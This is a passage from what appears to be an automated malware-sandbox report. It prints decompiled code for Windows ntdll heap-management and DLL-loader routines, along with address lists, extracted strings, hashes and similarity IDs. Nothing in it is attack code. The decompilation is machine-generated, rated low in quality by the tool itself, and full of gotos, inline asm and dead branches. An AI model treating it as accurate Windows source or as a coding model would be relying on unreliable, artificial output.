									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0195A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0195A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x1988748 - 1;
					if( *0x1988748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E0189B150();
							} else {
								E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E0189B150();
							__eflags =  *0x1987bc8;
							if(__eflags == 0) {
								_t131 = E01952073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                0x018ba83a
                0x018ba83c
                0x018ba83e
                0x018ba841
                0x018ba844
                0x018ba84a
                0x018baa53
                0x018baa59
                0x018baa59
                0x018ba858
                0x018ba85e
                0x018baaf5
                0x018baafc
                0x0190229e
                0x019022a2
                0x019022a8
                0x019022b3
                0x019022b5
                0x019022bb
                0x019022c1
                0x019022c5
                0x019022e6
                0x019022eb
                0x019022f0
                0x019022c7
                0x019022dc
                0x019022e1
                0x019022e1
                0x019022f3
                0x019022f8
                0x019022fd
                0x01902300
                0x01902307
                0x0190230e
                0x0190230e
                0x01902313
                0x01902313
                0x019022b5
                0x019022a2
                0x018baafc
                0x018ba864
                0x018ba869
                0x018baa5c
                0x018baa5e
                0x018ba86f
                0x018ba87f
                0x018ba885
                0x018ba885
                0x018ba88b
                0x018ba890
                0x018ba896
                0x018bab0c
                0x018bab0f
                0x018bab15
                0x01902320
                0x01902320
                0x018bab1b
                0x018ba89c
                0x018ba89f
                0x018ba8a2
                0x018ba8a2
                0x018ba8a5
                0x018ba8af
                0x018ba8b3
                0x018ba8b8
                0x018baa66
                0x018ba8be
                0x018ba8c5
                0x018ba8c6
                0x018ba8ce
                0x01902328
                0x01902332
                0x01902337
                0x01902337
                0x018ba8ce
                0x018ba8d4
                0x018ba8d8
                0x018ba8db
                0x018ba8de
                0x018ba8e1
                0x018ba8e5
                0x018ba8e8
                0x018ba8f0
                0x018ba8f3
                0x0190234c
                0x01902350
                0x01902355
                0x01902359
                0x01902359
                0x018ba8f9
                0x018ba901
                0x018baae4
                0x018baae4
                0x018baaea
                0x00000000
                0x018ba907
                0x018ba90a
                0x018ba91d
                0x018ba91d
                0x00000000
                0x018ba910
                0x018ba910
                0x018ba910
                0x018ba914
                0x018ba924
                0x018ba924
                0x018ba924
                0x018ba924
                0x018ba916
                0x018ba91b
                0x00000000
                0x00000000
                0x00000000
                0x018ba91b
                0x018ba925
                0x018ba925
                0x018ba932
                0x018ba936
                0x018ba93c
                0x018ba93c
                0x018ba93c
                0x018bab22
                0x018bab24
                0x018bab27
                0x018bab27
                0x018ba942
                0x018ba944
                0x018baaba
                0x018baabd
                0x018baac0
                0x018baac0
                0x018baac2
                0x018bab2f
                0x018baac4
                0x018baac4
                0x018baac7
                0x018baaca
                0x018baacc
                0x018baace
                0x018baace
                0x018baace
                0x018baad1
                0x018baad1
                0x018baad7
                0x018baad9
                0x00000000
                0x00000000
                0x01902361
                0x01902369
                0x0190236b
                0x00000000
                0x01902371
                0x00000000
                0x01902371
                0x00000000
                0x0190236b
                0x018baac0
                0x018ba94a
                0x018ba94a
                0x018ba94d
                0x018ba94d
                0x018ba950
                0x018ba954
                0x01902376
                0x01902380
                0x018ba95a
                0x018ba95a
                0x018ba95c
                0x018ba95f
                0x018ba961
                0x018ba961
                0x018ba967
                0x018ba96a
                0x018ba972
                0x018baa02
                0x018baa06
                0x018baa10
                0x018baa16
                0x018baa16
                0x018baa1b
                0x018baa21
                0x018baa24
                0x018baa27
                0x018baa29
                0x018baa2c
                0x018baa32
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x018ba978
                0x018ba978
                0x018ba97b
                0x018ba981
                0x018ba996
                0x018ba998
                0x018ba99f
                0x018ba9a2
                0x0190238a
                0x018ba9a8
                0x018ba9a8
                0x018ba9a8
                0x018ba9aa
                0x018ba9ad
                0x018ba9b0
                0x018ba9bb
                0x018ba9be
                0x018ba9c7
                0x018ba9c9
                0x018ba9c9
                0x018ba9cc
                0x018ba9d1
                0x018baa6d
                0x018baa70
                0x018baa73
                0x018baa75
                0x018baa79
                0x018baa7e
                0x018baa82
                0x018baa8f
                0x018baa94
                0x018baa96
                0x01902392
                0x019023a1
                0x019023a1
                0x018baa9c
                0x018baa9f
                0x018baaa2
                0x018baaa2
                0x018baaa8
                0x018baaab
                0x018baaaf
                0x00000000
                0x018baab5
                0x00000000
                0x018baab5
                0x018ba9d7
                0x018ba9d7
                0x018ba9da
                0x018ba9e0
                0x018ba9e3
                0x018ba9e6
                0x018ba9e9
                0x018ba9eb
                0x018ba9fd
                0x018ba9fd
                0x00000000
                0x018ba9eb
                0x00000000
                0x00000000
                0x00000000
                0x018ba983
                0x018ba983
                0x018ba983
                0x018ba987
                0x018ba995
                0x018ba995
                0x018ba995
                0x018ba995
                0x018ba989
                0x018ba98e
                0x00000000
                0x018ba990
                0x00000000
                0x018ba990
                0x018ba98e
                0x00000000
                0x018ba983
                0x018ba972
                0x018ba90a
                0x018baa34
                0x018baa34
                0x018baa40
                0x018baa43
                0x018baa46
                0x018baa4d
                0x019023ab
                0x019023b2
                0x019023b8
                0x019023be
                0x019023c3
                0x019023c5
                0x019023cb
                0x019023d1
                0x019023d5
                0x019023f6
                0x019023fb
                0x019023d7
                0x019023ec
                0x019023f1
                0x01902403
                0x01902408
                0x01902410
                0x01902417
                0x01902422
                0x01902422
                0x01902417
                0x019023c5
                0x019023b2
                0x00000000

                Strings
                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01902403
                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 019022F3
                • HEAP[%wZ]: , xrefs: 019022D7, 019023E7
                • HEAP: , xrefs: 019022E6, 019023F6
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                • API String ID: 0-1657114761
                • Opcode ID: 5615d901377bf8fd1c73cf9cd2c3f9e1f0195032f01d5d354084786dfabe7fd0
                • Instruction ID: dafe782a4ffec24e123f3d0b91e9618f95c508c262b7018af55fc5944d27a9cd
                • Opcode Fuzzy Hash: 5615d901377bf8fd1c73cf9cd2c3f9e1f0195032f01d5d354084786dfabe7fd0
                • Instruction Fuzzy Hash: F2D1CF74A006069FDB29CF68C4D0BBABBF1BF48304F148569D95ADB781E334EA45CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018BA229, Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                Download Yara Rule
                C-Code - Quality: 69%
                			E018BA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E018BDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E018D9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0195A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E018D9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E0189B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E018B7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0195138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E018B7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E018B7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01951582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E018B7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E018B7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01951582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E018ED5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                0x018ba229
                0x018ba231
                0x018ba23f
                0x018ba242
                0x018ba244
                0x018ba24c
                0x018ba255
                0x018ba25a
                0x018ba25f
                0x01901c76
                0x01901c78
                0x01901c7e
                0x01901c7f
                0x01901c81
                0x01901c82
                0x01901c84
                0x01901c89
                0x01901c8b
                0x01901c9e
                0x01901c9e
                0x01901cab
                0x01901cb2
                0x00000000
                0x01901cb2
                0x01901c8d
                0x01901c92
                0x00000000
                0x00000000
                0x01901c94
                0x01901c98
                0x00000000
                0x00000000
                0x00000000
                0x01901c98
                0x018ba265
                0x018ba265
                0x018ba266
                0x018ba26f
                0x018ba270
                0x018ba276
                0x018ba277
                0x018ba279
                0x018ba27e
                0x018ba282
                0x01901db5
                0x01901dbb
                0x01901dc1
                0x01901dc5
                0x01901de4
                0x01901de9
                0x01901dc7
                0x01901ddc
                0x01901de1
                0x01901def
                0x01901df3
                0x01901df7
                0x01901dfe
                0x01901e06
                0x018ba302
                0x018ba308
                0x018ba308
                0x018ba288
                0x018ba28d
                0x018ba294
                0x01901cc1
                0x018ba29a
                0x018ba29a
                0x018ba29a
                0x018ba29f
                0x01901ccb
                0x01901cd1
                0x01901cd8
                0x01901cea
                0x01901cea
                0x01901cd8
                0x018ba2a9
                0x018ba2af
                0x018ba2bc
                0x01901cfd
                0x018ba2c2
                0x018ba2c2
                0x018ba2c2
                0x018ba2c7
                0x01901d07
                0x01901d0d
                0x01901d14
                0x01901d1f
                0x01901d21
                0x01901d2c
                0x01901d2c
                0x01901d2c
                0x01901d47
                0x01901d47
                0x01901d14
                0x018ba2cd
                0x018ba2d2
                0x018ba2d9
                0x01901d5a
                0x018ba2df
                0x018ba2df
                0x018ba2df
                0x018ba2e4
                0x01901d69
                0x01901d6b
                0x01901d76
                0x01901d76
                0x01901d76
                0x01901d91
                0x01901d91
                0x018ba2ea
                0x018ba2f0
                0x018ba2f5
                0x01901da8
                0x01901dad
                0x01901dad
                0x018ba2fd
                0x018ba300
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                • API String ID: 2994545307-2586055223
                • Opcode ID: 2b175b072bb1f2fb4db44851ca547b763f80e307a3cc83c215315fae3be867cf
                • Instruction ID: e63587cfd8a1de468d961eb1a77c1e6ee5d0ca8cd4cc3abb1b50e1039c7b3791
                • Opcode Fuzzy Hash: 2b175b072bb1f2fb4db44851ca547b763f80e307a3cc83c215315fae3be867cf
                • Instruction Fuzzy Hash: 3651F4322056819FE712EB6CC884FA777E8EB80B54F190568F959CB3D1D764EA40CB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018C8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                Download Yara Rule
                C-Code - Quality: 44%
                			E018C8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x198d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1988464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1985780 & 0x00000003) != 0) {
							E01915510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1985780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E018DB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1987984; // 0x15d2be0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1988464; // 0x74790110
					 *0x198b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E018C9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1985780 & 0x00000005) != 0) {
						_push(_t49);
						E01915510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                0x018c8e0f
                0x018c8e16
                0x018c8e19
                0x018c8e1b
                0x018c8e21
                0x018c8e7f
                0x018c8e85
                0x01909354
                0x0190936c
                0x01909371
                0x0190937b
                0x01909381
                0x01909381
                0x0190937b
                0x018c8e9d
                0x018c8e9d
                0x018c8e29
                0x018c8e2c
                0x018c8e38
                0x018c8e3e
                0x018c8e43
                0x018c8eb5
                0x018c8eb9
                0x019092aa
                0x019092af
                0x019092e8
                0x019092e8
                0x019092af
                0x018c8eb9
                0x018c8e45
                0x018c8e53
                0x018c8e5b
                0x018c8e5f
                0x018c8e78
                0x018c8e78
                0x018c8e7d
                0x018c8ec3
                0x018c8ecd
                0x018c8ed2
                0x018c8ed2
                0x018c8ec5
                0x018c8ec5
                0x00000000
                0x018c8e7d
                0x018c8e67
                0x018c8ea4
                0x0190931a
                0x00000000
                0x00000000
                0x01909320
                0x018c8ea4
                0x018c8e70
                0x01909325
                0x01909340
                0x01909345
                0x01909345
                0x018c8e76
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                Strings
                • LdrpFindDllActivationContext, xrefs: 01909331, 0190935D
                • Querying the active activation context failed with status 0x%08lx, xrefs: 01909357
                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0190932A
                • minkernel\ntdll\ldrsnap.c, xrefs: 0190933B, 01909367
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID:
                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                • API String ID: 0-3779518884
                • Opcode ID: e73babf555167d99bf2464a008c1d75f28451e3f64a36fc6f32ecc8056658e2f
                • Instruction ID: 57f4519c4c79b1ce37f524deda989cc4fffb860143210e900c7f3b5bd96e751e
                • Opcode Fuzzy Hash: e73babf555167d99bf2464a008c1d75f28451e3f64a36fc6f32ecc8056658e2f
                • Instruction Fuzzy Hash: 33411E31A803199FEB36AA5CC888A397764AB43F58F06416DE508D7192E770EF80CF81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 019549A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000008.00000002.476748444.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                Similarity
                • API ID: InitializeThunk
                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                • API String ID: 2994545307-336120773
                • Opcode ID: cdf15d2258a8a554012a5f62b877affa974cda802c0ac08afd28e4f65cf640d3
                • Instruction ID: 7634f567299893e3034d005b7b6c428e1a16696b42b82a6bedd463509256956f
                • Opcode Fuzzy Hash: cdf15d2258a8a554012a5f62b877affa974cda802c0ac08afd28e4f65cf640d3
                • Instruction Fuzzy Hash: 1A312471200500EFD7E1DB9DC889F67B7A8EF01B21F184469F909EB251F670EA80CB69
                Uniqueness

                Uniqueness Score: -1.00%

                Function 018A8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                Download Yara Rule
                C-Code - Quality: 83%
                			E018A8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E018A934A() != 0) {
								_t159 = E0191A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1985780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01915510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1985780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E018A849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E018A8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E018A8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1985c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1985c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E018B2280(_t92, 0x19886cc);
															_t94 = E01969DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E018C61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1985c64 + _t91 * 8;
